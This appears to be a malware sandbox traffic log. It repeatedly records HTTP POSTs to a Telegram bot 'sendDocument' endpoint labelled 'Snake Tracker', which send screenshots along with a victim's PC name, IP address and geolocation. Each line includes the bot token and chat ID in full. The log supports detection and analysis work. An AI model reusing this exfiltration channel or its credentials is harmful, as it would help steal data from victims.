                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd52621a53558f | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd529f469c46cf | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd527858d8e06d | Host: api.telegram.org | Content-Length: 708871
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd52b54d4321b1 | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd52926ced3f6f | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd52e126516bca | Host: api.telegram.org | Content-Length: 708871
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd52ab19b3a220 | Host: api.telegram.org | Content-Length: 709019 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd52f5b3c3d196 | Host: api.telegram.org | Content-Length: 709019 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd52baa27237de | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd531094a8e31d | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd52d32761eede | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global traffic | HTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dd532a1929ec59 | Host: api.telegram.org | Content-Length: 708871 | Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd52ee25ccbe96Host: api.telegram.orgContent-Length: 709301Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd534b2a82ce6fHost: api.telegram.orgContent-Length: 709035Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53067cb44c72Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd536ad406e147Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5323d71b77e3Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5389207e2af1Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53425b214fa7Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53b025be574fHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5365d6eb9d0eHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53d84a6f0a7bHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53ff101227c7Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5386acd74a6bHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd543714563e9dHost: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53b66f190127Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5464fb1a232bHost: api.telegram.orgContent-Length: 709261Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd53dabd910181Host: api.telegram.orgContent-Length: 709261Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd54a2cf5faa4eHost: api.telegram.orgContent-Length: 701171Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:25%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd54016fcc0347Host: api.telegram.orgContent-Length: 708871Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST /bot7967054436:AAEM9PFKBirZzrcJ_AQreC9wDTN-AOtN0uM/sendDocument?chat_id=5007084465&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Tracker%0D%0A%0D%0AScreenshot%20%7C%20user%20%7C%20Snake%0D%0A%20%0D%0A%0D%0APC%20Name:830021%0D%0ADate%20and%20Time:%2019/02/2025%20/%2010:38:21%0D%0AClient%20IP:%208.46.123.189%0D%0A%0D%0ACountry%20Name:%20United%20States%0D%0ACountryCode:%20US%0D%0ARegion%20Name:%20New%20York%0D%0ARegion%20Code:%20NY%0D%0ACity:%20New%20York%0D%0ATimeZone:%20America/New_York%0D%0ALatitude:%2040.7123%0D%0ALongitude:%20-74.0068%0D%0AStub%20Version:%205.1 HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd54e05f5db70bHost: api.telegram.orgContent-Length: 709502Connection: Keep-Alive
